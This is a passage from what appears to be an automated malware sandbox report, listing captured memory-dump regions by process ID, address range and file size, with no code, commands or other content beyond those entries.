                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/2024-205-0x000000001CA50000-0x000000001CA51000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/2024-169-0x000000001B370000-0x000000001B372000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                • memory/2024-168-0x0000000000E70000-0x0000000000E71000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/2024-208-0x000000001B372000-0x000000001B374000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                • memory/2024-163-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/2024-193-0x000000001B300000-0x000000001B301000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/2024-175-0x000000001B2C0000-0x000000001B2C1000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/2044-402-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/2044-457-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/2100-177-0x0000000000C0D000-0x0000000000C1D000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  64KB

                                                                                                                                                                                                                                                                • memory/2100-170-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/2100-178-0x0000000000B20000-0x0000000000B29000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  36KB

                                                                                                                                                                                                                                                                • memory/2100-448-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/2156-421-0x0000000005700000-0x0000000005CA6000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  5.6MB

                                                                                                                                                                                                                                                                • memory/2156-373-0x0000000005700000-0x0000000005CA6000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  5.6MB

                                                                                                                                                                                                                                                                • memory/2156-361-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/2192-247-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/2192-250-0x0000000000D20000-0x0000000000D21000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/2200-568-0x0000000007402000-0x0000000007403000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/2200-544-0x0000000007400000-0x0000000007401000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/2272-562-0x0000000006E90000-0x0000000006E91000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/2348-469-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/2460-147-0x0000000000400000-0x0000000000408000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  32KB

                                                                                                                                                                                                                                                                • memory/2460-146-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/2468-553-0x0000000005880000-0x0000000005E82000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  6.0MB

                                                                                                                                                                                                                                                                • memory/2488-203-0x00000000024D4000-0x00000000024D6000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                • memory/2488-196-0x0000000005D40000-0x0000000005D41000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/2488-189-0x00000000051F0000-0x00000000051F1000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/2488-188-0x0000000002510000-0x000000000252B000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  108KB

                                                                                                                                                                                                                                                                • memory/2488-201-0x00000000024D2000-0x00000000024D3000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/2488-190-0x0000000005810000-0x0000000005811000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/2488-202-0x00000000024D3000-0x00000000024D4000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/2488-200-0x00000000024D0000-0x00000000024D1000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/2488-195-0x0000000005A90000-0x0000000005A91000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/2488-194-0x0000000005A40000-0x0000000005A41000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/2488-187-0x0000000004C40000-0x0000000004C41000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/2488-199-0x0000000000400000-0x0000000000433000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  204KB

                                                                                                                                                                                                                                                                • memory/2488-191-0x0000000005830000-0x0000000005831000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/2488-204-0x0000000005E20000-0x0000000005E21000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/2488-182-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/2488-185-0x00000000023D0000-0x00000000023EC000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  112KB

                                                                                                                                                                                                                                                                • memory/2488-192-0x0000000005940000-0x0000000005941000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/2488-183-0x0000000000400000-0x0000000000433000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  204KB

                                                                                                                                                                                                                                                                • memory/2744-375-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/2744-395-0x0000000004622000-0x0000000004623000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/2744-486-0x0000000004625000-0x0000000004627000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                • memory/2744-394-0x0000000004620000-0x0000000004621000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/2804-198-0x0000000002150000-0x0000000002180000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  192KB

                                                                                                                                                                                                                                                                • memory/2804-179-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/2804-197-0x0000000002120000-0x0000000002142000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  136KB

                                                                                                                                                                                                                                                                • memory/2996-549-0x0000000005260000-0x0000000005261000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/2996-557-0x0000000002A30000-0x0000000002A31000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/3016-219-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/3016-222-0x0000000000770000-0x000000000079B000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  172KB

                                                                                                                                                                                                                                                                • memory/3016-345-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/3016-223-0x00000000021B0000-0x00000000021E9000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  228KB

                                                                                                                                                                                                                                                                • memory/3016-357-0x0000000004FA0000-0x0000000004FA1000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/3016-358-0x0000000004FA2000-0x0000000004FA3000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/3048-460-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/3112-450-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/3136-452-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/3136-523-0x0000000006CB0000-0x0000000006CB1000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/3180-154-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/3208-162-0x0000000004620000-0x0000000004636000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  88KB

                                                                                                                                                                                                                                                                • memory/3208-150-0x0000000002A80000-0x0000000002A96000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  88KB

                                                                                                                                                                                                                                                                • memory/3240-341-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/3304-224-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/3304-227-0x0000000000430000-0x0000000000431000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/3304-229-0x0000000002750000-0x0000000002751000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/3304-230-0x0000000004DA0000-0x0000000004DA1000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/3344-340-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/3368-440-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/3376-468-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/3496-238-0x0000000007290000-0x0000000007291000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/3496-245-0x0000000008500000-0x0000000008501000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/3496-256-0x0000000008A20000-0x0000000008A21000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/3496-233-0x0000000003060000-0x0000000003061000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/3496-231-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/3496-234-0x0000000004960000-0x0000000004961000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/3496-235-0x0000000007510000-0x0000000007511000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/3496-255-0x00000000089D0000-0x00000000089D1000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/3496-236-0x0000000004920000-0x0000000004921000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/3496-237-0x0000000004922000-0x0000000004923000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/3496-252-0x00000000096E0000-0x00000000096E1000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/3496-232-0x0000000003060000-0x0000000003061000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/3496-239-0x00000000073F0000-0x00000000073F1000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/3496-243-0x00000000080A0000-0x00000000080A1000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/3496-242-0x0000000007C80000-0x0000000007C81000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/3496-241-0x0000000007C10000-0x0000000007C11000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/3572-451-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/3660-472-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/3680-329-0x0000000006EE2000-0x0000000006EE3000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/3680-328-0x0000000006EE0000-0x0000000006EE1000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/3680-305-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/3680-355-0x0000000006EE5000-0x0000000006EE7000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                • memory/3736-455-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/3780-546-0x0000000005330000-0x0000000005932000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  6.0MB

                                                                                                                                                                                                                                                                • memory/3896-445-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/3896-296-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/3916-151-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/4016-422-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/4016-444-0x0000000004DC0000-0x00000000053C2000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  6.0MB

                                                                                                                                                                                                                                                                • memory/4036-295-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/4044-539-0x0000000004622000-0x0000000004623000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/4044-545-0x0000000004620000-0x0000000004621000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/4116-447-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/4120-403-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/4276-453-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/4292-465-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/4332-470-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/4632-464-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/4652-489-0x0000000000E90000-0x0000000000E91000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/4652-494-0x0000000000E92000-0x0000000000E93000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/4672-462-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/4844-218-0x0000000002680000-0x000000000270F000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  572KB

                                                                                                                                                                                                                                                                • memory/4844-214-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/4844-217-0x0000000000BDC000-0x0000000000C2B000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  316KB

                                                                                                                                                                                                                                                                • memory/4916-509-0x0000000002700000-0x0000000002760000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  384KB

                                                                                                                                                                                                                                                                • memory/4916-473-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/4936-467-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/4992-471-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/5028-466-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/5104-491-0x0000000004C40000-0x0000000004C41000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/5104-459-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                • memory/5104-495-0x0000000004C42000-0x0000000004C43000-memory.dmp
                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                • memory/5112-449-0x0000000000000000-mapping.dmp